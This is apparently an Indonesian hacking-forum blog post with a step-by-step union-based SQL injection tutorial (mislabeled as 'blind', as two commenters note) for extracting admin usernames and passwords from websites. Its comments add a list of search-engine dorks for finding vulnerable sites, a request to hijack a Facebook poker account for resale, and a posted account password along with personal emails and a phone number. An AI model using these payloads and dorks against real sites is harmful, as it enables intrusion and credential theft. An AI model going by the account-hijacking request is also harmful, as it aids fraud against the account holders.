Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Simple Blind SQL Injection Method

14 November 2009
Penulis:   · Kategori Artikel: Hacking

BINUS HACKER Binus Hacker Is Not Criminal Banner





Simple Blind SQL Injection Methode V4 Tutorial
Langkah Pertama:

Find the target
ex: /news.php?pid=1

Add character ‘ at end of url to find error message.
ex: /news.php?pid=1′ atau

===========
=step two=
===========

find and count to amount the table in database.
use the command : order by

es: [site]/news.php?pid=-1+order+by+1–

chek step by step…
misal: /news.php?pid=-1+order+by+1–
/news.php?pid=-1+order+by+2–
/news.php?pid=-1+order+by+3–
/news.php?pid=-1+order+by+4–

so it appears error message or missing error…
ex: /news.php?pid=-1+order+by+5–

so that we take is up to number 4
ex: /news.php?pid=-1+order+by+4–

============
=step three=
============

for show the numbers that appear use the union
coz it error until 5
do this: /news.php?pid=-1+union+select+1,2,3,4–

=============
=step four:=
=============

find the tabble
you can use your logic
example the table is
admin, admins, login, logins, user, users

use command +from+(table_name)–

ok do this
ex : /news.php?pid=-1+union+select+1,2,3,4+from+admin–
if not have error

and you can see the number is appear for example 2
go to the next step

============
=step five=
============

find the username & peassword coloumn
for username
use ur logic again
example:
user, usr, username, user_name, login, user_admin, name, admin_user, and etc

last number 2 is appear
do this
ex : /news.php?pid=-1+union+select+1,username,3,4+from+admin–

example appear : admin
admin is username

for password
use ur logic again
example:
password, pswd, passwd, pass, pwd, kunci, masuk, sandi, and etc

ex : /news.php?pid=-1+union+select+1,password,3,4+from+admin–

example appear : 123456
123456 is password

===============
=step six:=
===============

ok in the last step you must find admin page

ex : website.com/admin

sorry bhs inggris hehehehe..

=====================
: Special thx to :
Allah SWT

: My teacher :
vyc0d, Gonzhack
=====================
: thx to :
MR.FRIBO, DHIYAT, BOBYHIKARU, N4CK0, RAJEZ, AZZURE,SICK_HACKER, mas UTUH
AA EZHA, crusdd2, DIMAZ,DUDULS, slalu_ngantuk,ku51_g0y4n9 & BEJAMZ
: thx for the team :
N.G.U TEAM, CYBERDOS TEAM, HACKER NEWBIE TEAM, XPGROUND TEAM, DEVILZC0DE, TECON CREW, IDC
=====================

BINUS HACKER Binus Hacker Chat and Forum

Komentar

31 Komentar Untuk “Simple Blind SQL Injection Method
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. suicidal pada 18 November 2009 5:47 am

    dah bnyk korban gw kok..
    masih bnyk web yang bugs kyk gni..

    dork nya nih..

    inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
    inurl:”id=” & intext:”Warning: mysql_fetch_array()
    inurl:”id=” & intext:”Warning: mysql_num_rows()
    inurl:”id=” & intext:”Warning: session_start()
    inurl:”id=” & intext:”Warning: getimagesize()
    inurl:”id=” & intext:”Warning: is_writable()
    inurl:”id=” & intext:”Warning: getimagesize()
    inurl:”id=” & intext:”Warning: Unknown()
    inurl:”id=” & intext:”Warning: session_start()
    inurl:”id=” & intext:”Warning: mysql_result()
    inurl:”id=” & intext:”Warning: pg_exec()
    inurl:”id=” & intext:”Warning: mysql_result()
    inurl:”id=” & intext:”Warning: mysql_num_rows()
    inurl:”id=” & intext:”Warning: mysql_query()
    inurl:”id=” & intext:”Warning: array_merge()
    inurl:”id=” & intext:”Warning: preg_match()
    inurl:”id=” & intext:”Warning: ilesize()
    inurl:”id=” & intext:”Warning: filesize()
    inurl:”id=” & intext:”Warning: require()

  2. stinky pada 22 November 2009 3:51 am

    kak tlng kirimkan video hacking sql injaction dan cara caranya.coz gw masih bingung.kok examplenya news.PhP?Pid=1 itu ulr apaan ya .Maklum msh newbie

    kirimkan ke email ku budimetal93@yahoo.com

  3. rifki oke pada 7 December 2009 3:12 am

    broooo……CMS wordpress bisa di sql injection ngk????

    klo bisa kasi tw cara ny dun9??????hehehehehehe

    salam. . . .

  4. d3r1l_o1o1 pada 9 December 2009 9:39 pm

    @stinky
    ok bro tar ane kirimin ke email ente :)

    @rifki oke
    bisa ko justru kebanyakan pake SQLi tapi nge decript hashnya susah bro hehehee

  5. FedEx MiLDNeT pada 10 December 2009 8:11 am

    pak de bius…ajarin inject site https dunk

  6. d3r1l_o1o1 pada 11 December 2009 2:08 am

    emang https bsa di inject y? stau ane sih g bsa

  7. UtuH pada 12 December 2009 1:35 am

    @d3r1l: https bisa di inject kok, asalkan ada vuln pada konteks php server / systemnya :) there is no need. https itu cuma untuk pengirimian data yg di enkripsi supaya lebih aman. gak ada spy di perjalanan data.

  8. Gambit pada 26 December 2009 7:25 am

    mas, bisa minta tolong dihackin account fbku gak, biar chip pokernya tambah banyak, soalnya ditempatku jualan chip tu rame bgt, nanti aku bagi deh hasilnya, transfer duit gitu, lumayan lho mas, 1B tu laku 7 jutaan, gimana?ada aja aku pembelinya, pokoknya chip ada, uang gak pernah susah….berminat? hubungi aja emailku: mikael_4ngello@yahoo.co.uk

    account fbku
    cute_casper91@yahoo.ca
    passwordnya : gundhabagus

    nanti kalo udah jadi, kasih tau lewat sms, 081359772416,
    sesama bisnis internet saling percaya aja…
    tolong mas, aku lagi BU(butuh duit)
    kasih aja 2B, nanti aku kasih 7 jt, gmn?
    pokoknya masukin dulu chipnya,
    ganti passwordnya, abis tu sms detailnya…

    balesan aku tunggu di mikael_4ngello@yahoo.co.uk

  9. jafar pada 27 December 2009 3:51 am

    blur,,,, sumpah ajarin w step by step dong…. kirim ke email w yah,,,, w lagi ada tugas tentang hacking nih dari dosen w,tpi pake SQL injections,,,, nieh email w jafar0n7@gmail.com

  10. init0 pada 4 January 2010 12:27 pm

    @d3r1l_o1o1
    hiks.. hiks..
    setau ane sih, wordpress versi 2.2 kebawah yng bisa diinject,
    bug ny ada di file
    /wp-admin/admin-ajax.php ,

    mulai dari versi 2.2 keatas kykny blum ktemu bug sqli nyh .
    klo wordpress versi 2.3 smpet ada bug xss aja di file :
    /wp-admin/edit-post-rows.php

    utk https bner kt omz utuh , https itu cuma pengirimian data ny aja yg di enkripsi ,
    jd ga bisa di sniff a.k.a ngintip pke wireshark :D , klo sqli ya ttep bisa, coz sqli kn bug ny di aplikasi web nya , bukan di server :D

    *CMIIW*

  11. UtuH pada 4 January 2010 5:03 pm

    @Init0: Yooo.. :)
    WP juga bs di SQLI sebenernya, cuman berhubung communitas codernya banyak. jadi cepet update sama releasenya.

    Info kelemahan WP sebenarnya ada di:
    http://core.trac.wordpress.org

    Ini sebenernya rahasia, tapi gpplah buat berbagi anak” binushacker. Wkwkwkw..
    Enjoy & eat it!

  12. blitZerlamer pada 5 January 2010 8:56 am

    “Keingintahuanku adalah sebagian dari kejahatanku”tp hatiku terlalu lembut untuk merusak.aq hanya ingin tahu…

  13. d3r1l_o1o1 pada 16 January 2010 1:52 am

    tuh udh di jawab sama bang utuh hehehe.. ane mah masih g bsa apa2 ane juniornya mas utuh :)

  14. irham pada 25 January 2010 6:22 pm

    om ajarin aku dund, cz aq msh newbie bngt nh,, and bg aku video and tutorial’a jg dund,, kirim za ke irham_21@yahoo.co.id trims y om

  15. keeppix pada 5 February 2010 7:50 am

    minta tutz sqli dunk kk master… :)

    keeppix@gmail.com

  16. asduk pada 5 February 2010 11:03 am

    taek campur-taek campur

  17. d3r1l_o1o1 pada 22 February 2010 4:23 am

    nih video buat v5 v4nya menyusul y hihihihi

    http://www.facebook.com/video/video.php?v=1276289680629

  18. kingkong pada 3 March 2010 6:20 am

    hacking hacking

    aku suka belajar hacking

    tapi g mudeng2 …

    hacking hacking …

    dhuwur dewe ..

    tengkiu tutorialnya sob

  19. ceng ho pada 14 March 2010 8:47 am

    y elah… susah amat yak?

    cara perlahan dong master? kirim ke liveniping@yahoo.com ya

  20. Toggog78 pada 21 March 2010 12:36 am

    bisa minta bantuannya uh gw harap trimood meed TOKE bisa habis, oiya gw punya akun Fb : facebook_apps_zynga@cyber-wizard.com
    ini akun khusus main poker hasilnya buat mendirikan CampsJakarta “Rumah Singah Di Jakarta” Untuk mereka yang dari daerah dan hal lain bermuatan sosial murni di garis balik tirai bambu

  21. Bobyhikaru pada 20 June 2010 8:31 pm

    ada nama saya di sana waw

  22. BM pada 30 November 2010 6:01 pm

    kk ak nda ngerti ak coba2 kok nda bisa ya tlg kirimin video nya ato gmana gt yg lebih jelas newbie bgt nih ak

  23. andika pada 9 December 2010 6:07 pm

    wah tutorial yang bagus

    nice info

  24. Newbie pada 30 December 2010 9:58 pm

    gan ada link Buat download SQL Injection V4 G..?? klo ada tlng share y thx….

  25. Gaply pada 3 March 2011 4:05 am

    bos…
    ane minta modul hackingnya donk….
    plis namanya juga pemuda yang baru terjun………
    tapi cuma buat latihan aja, ga ada niat unsur ngerusak…….
    trims…..

  26. okta pada 12 March 2011 5:57 am

    gan ko ga bisa yah…!!!
    ga mncul psan eror.a…???
    mhon bntuannya lgi donk…

  27. okta pada 12 March 2011 5:57 am

    klo bleh mnta module.a donk…..
    dah nyoba tapi ga berhsil2…

  28. OQ pada 29 May 2011 2:20 am

    Ini bukannya SQLi biasa? Klo blind SQLi kan gak perlu pake /* atau –

    Klo kayak SQLi biasa kayak gitu saya juga udah bisa!

    Jangan nipu donk! Atau cuma asal copas aja nih…

  29. Atherol pada 19 June 2011 12:01 pm

    Thanks for a great posting! I loved reading it.

  30. anon pada 9 July 2011 7:45 am

    Berhubung kalau search di google ‘blind sql injection’ halaman ini muncul paling atas, mau lurusin aja kalau Blind SQL Injection itu result dari injectionnya gak keliatan sama attackernya. Bukan yang pake coba-coba kayak begini. Jadi yang di atas ini sql injection biasa.

    CMIIW

  31. djiesoft team pada 27 August 2012 11:42 pm

    wahhh keren , ternyata sql injection itu sangat berbahaya ya… ckcckckc

Silahkan Berikan Tanggapan Anda...